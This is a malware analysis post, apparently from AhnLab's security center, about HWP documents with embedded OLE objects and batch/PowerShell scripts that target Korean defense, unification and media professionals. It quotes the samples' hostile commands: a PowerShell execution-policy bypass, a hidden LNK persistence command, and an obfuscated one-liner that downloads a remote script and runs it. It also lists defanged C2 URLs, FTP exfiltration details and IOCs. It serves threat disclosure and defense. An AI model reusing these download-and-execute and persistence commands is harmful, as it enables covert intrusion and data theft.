AhnLab Security Emergency response Center (ASEC) found HWP documents that were embedded with OLE objects, targeting individuals in specific sectors such as the national defense and the press. The malware is presumed to be distributed mainly through download URLs or attachments in emails. The file names of the distributed documents are relevant to the areas of national defense, unification, education, and broadcasting, suggesting that the malware targets professionals involved in these areas.
The HWP documents analyzed in this post largely fall into two types: one that connects to an external URL and one that creates an additional script file. [Type 2] has a similar operation method to the malware covered in a previous post [1] and also uses the same FTP server password. Such similarities allow us to believe that they were made by the same person.
The figure below shows a brief flow of operations of each type.
<Type 1>
This type accesses an external URL through an OLE object embedded in the HWP documents. Below are the file names of HWP documents presumed to be this type.
| Date | File name |
| May 25, 2023 | Unification** cue sheet May 29 Mon.hwp |
| May 25, 2023 | 20230508_ProfessorMeetingMaterial_NewTemplate.hwp |
| May 25, 2023 | (***)2023-05-30 Material for Professor Meeting.hwp |
| May 30, 2023 | Payment Receipt (Chief ***).hwp |
| May 30, 2023 | (Template)Payment Receipt_Congratulatory and Condolence Money.hwp |
| June 22, 2023 | 20230512_MyungbakScenario_Details.hwp |
| June 22, 2023 | 1-1.Installation of a Separate Service for Research Support Within the Overseeing Organization (** University Graduate School Academic-Industry Cooperation Center).hwp |
| June 22, 2023 | Reference Material for School President for the Honorary Doctorate Awarding Ceremony of Former Prime Minister Hu** ***.hwp |
| June 23, 2023 | [Faculty Training Department-489 (Attached)] [Attachment 3] Lecturer Card (Template).hwp |
| June 29, 2023 | National Defense and Protection Sacrificed to Political Disputes.hwp |
| July 11, 2023 | ** Unification April 30 2023 (Sun).hwp |
| July 17, 2023 | Special The Agricultural Industry and Quality of Life of North Korea ** Cho.hwp |
| July 20, 2023 | 42- Wagner’s Lesson (Aug 2023).hwp |
| July 24, 2023 | [Template1] Business Budget Issue Request.hwp |
| Aug 14, 2023 | Dissertation Evaluation (** Kwon).hwp |
| Sep 01, 2023 | Evidentiary Documents of Incentive Payment.hwp |
| Sep 04, 2023 | ** Unification Sep 06 Final Wednesday.hwp |
| Sep 06, 2023 | ** Kim_Statement of Honorarium Payment.hwp |
| Sep 19, 2023 | [Template_Attachment 5]_Recommender_Certificate_Template-** Jeon.hwp |
The HWP documents identified in Table 1 contain text that prompts the user to click the OLE object for it to run.
In the documents, the threat actor embedded an OLE object the size of which exceeds the page boundaries (see Figure 3), so that the OLE object runs no matter where the user clicks.
The embedded OLE object includes over 5 MB of dummy bytes and a malicious URL. Accordingly, when the user clicks the OLE object, an attempt is made to connect to the malicious URL contained within the object.
At the time of analysis, the URL was not available and anomalous behaviors could not be observed. The malicious URLs identified so far are as follows. It seems that these documents are being distributed to specific individuals due to the fact that each document uses a different parameter value.
- hxxp://host.sharingdocument[.]one/dashboard/explore/starred?hwpview=[specific value]
- hxxp://mail.smartprivacyc[.]com/get/account/view?myact=[specific value]
<Type 2>
This type has a malicious script file embedded in HWP documents, and ultimately, it executes an additional script code uploaded to GitHub. Below are the file names of HWP documents presumed to be this type.
| Date | File name |
| July 31, 2023 | test.hwp |
| July 27, 2023 | Honorarium Information_aa.hwp |
| Aug 31, 2023 | Consultation Request.hwp |
| Sep 01, 2023 | Honorarium Template.hwp |
| Sep 14, 2023 | main.hwp |
| Oct 04, 2023 | test1.hwp |
| 2023.10.04 | cna[q].hwp |
The document “test1.hwp” listed in Table 2 contains two file attachments and an embedded hyperlink that executes the corresponding script file (zz.bat).
When the HWP document is executed, the files zz.bat and oz.txt are created in the %temp% folder. When the user clicks on a blank area containing the embedded hyperlink or the zz.bat file icon, zz.bat is executed.
zz.bat contains PowerShell commands that download and execute additional data by connecting to a GitHub address inside oz.txt.
Thus, when zz.bat is executed, it ultimately connects to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt and executes a malicious script.
down.txt, info.txt, and upload.txt seen in Figure 10 all have obfuscated pieces of data uploaded. Upon connecting to the corresponding URLs, these pieces of data are deobfuscated with a certain key value then executed.
The PowerShell script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt contains four functions. Brief descriptions of each function’s features are given below.
| Function Name | Feature |
| mainFunc | Changes PowerShell policy Functions executed in the following order: getinfo – uploadResult – downCommand |
| getinfo | Executes the script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/info.txt Collects user PC information such as network configuration information |
| uploadResult | Executes the script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/upload.txt Uploads the collected information to the threat actor’s FTP server |
| downCommand | Executes the script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/down.txt Creates additional malicious files |
The function mainFunc which is executed first changes the current user’s PowerShell policy with the following command and enables the execution of the PowerShell script that is downloaded later on.
- Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass –Force
The function getinfo executes an obfuscated script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/info.txt.
The deobfuscated info.txt script is responsible for collecting user information. The collected pieces of information are stored in the file %APPDATA%AhnlabAhnlab.hwp.
The table below shows the collected pieces of information.
| Command | Collected Information |
| Get-ChildItem ([Environment]::GetFolderPath(“Recent”)) | List of recently used files |
| ipconfig /all | List of network configurations |
| Get-process | List of processes |
The function uploadResult also executes an obfuscated script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/upload.txt.
The deobfuscated upload.txt script sends the file containing the collected pieces of information (%APPDATA%AhnlabAhnlab.hwp) to the threat actor before deleting it. The threat actor used FTP to collect the exfiltrated data.
- Address: plm.myartsonline[.]com
- User name: 4154836
The function downCommand which is continuously executed afterward executes an obfuscated script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/down.txt.
The script down.txt creates an additional malicious file for the malware to maintain persistence. To enable the malicious script to be executed continuously, the threat actor creates an LNK file in the Startup folder.
The created LNK file contains a command that executes the file thumbs.log.
thumbs.log contains a PowerShell command which executes the script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt.
Thus, whenever the user restarts the PC, the script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt is run.
- LNK file command
C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -WindowStyle Hidden -command &{[string]$x= [IO.File]::ReadAllText(‘C:Users[user]AppDataRoamingMicrosoftWindowsthumbs.log‘);invoke-expression $x} - thumbs.log data
[string]$a = {(New-Object Net.WebClient).Doqwertyutring(‘hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt‘)};$b=$a.replace(‘qwertyu’,’wnloadS’);$c=iex $b;invoke-expression $c
While no additional malicious behaviors aside from collecting user information have been observed, a variety of malicious behaviors can be performed depending on the command uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt.
With the malware from the post in June [2] also being distributed through HWP documents, there are multiple malicious HWP documents in distribution nowadays. When opening an HWP document, users must pay attention to its author and the sender.
[File Detection]
Downloader/HWP.Agent (2023.06.27.00)
Downloader/HWP.Generic (2023.08.16.03)
Dropper/HWP.Generic (2023.10.18.02)
Downloader/PowerShell.Agent (2023.10.19.00)
Downloader/BAT.Agent (2023.10.19.00)
Trojan/LNK.Runner (2023.10.18.03)
Downloader/PowerShell.Generic (2023.10.18.03)
Trojan/PowerShell.Agent (2023.10.18.03)
Data/BIN.Encoded (2023.10.26.02)
[IOC]
<hwp>
2f0a67b719d8303c0ec7cc9057ed8411
af5bbab33f934dc016fc1aa0d910820e
7f3a30525b9324a2aeb32a9018df944f
361237b6b385874f02f3724ae50d1522
a242741873637fdac8f69f2ffdba47bc
<script>
7284a6376aa79a2384f797769b7ce086
2ef182bced72da507d2e403ab9db3c9f
f416b44332b4fb394b4735634cb07ff2
c16796909d5feea709d99e306f7e9975
0217e70fd7bc3a65ee0f2dd60ff85fbf
d5d395d90ccf9a7309f2f64169a2c019
8cafe74f03605a9bfaea5081b3ed0fc2
4934226f319d82ae092ada2525a7feb5
1061425d7e3d054a79f9294a2118b5da
2773acee87413790e9ace99c536c78ad
77edb140b86596eabe3602bb7febb997
<C2>
hxxp://host.sharingdocument.one/dashboard/explore/starred?hwpview=
hxxp://mail.smartprivacyc.com/get/account/view?myact=
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
Source: https://asec.ahnlab.com/en/58335/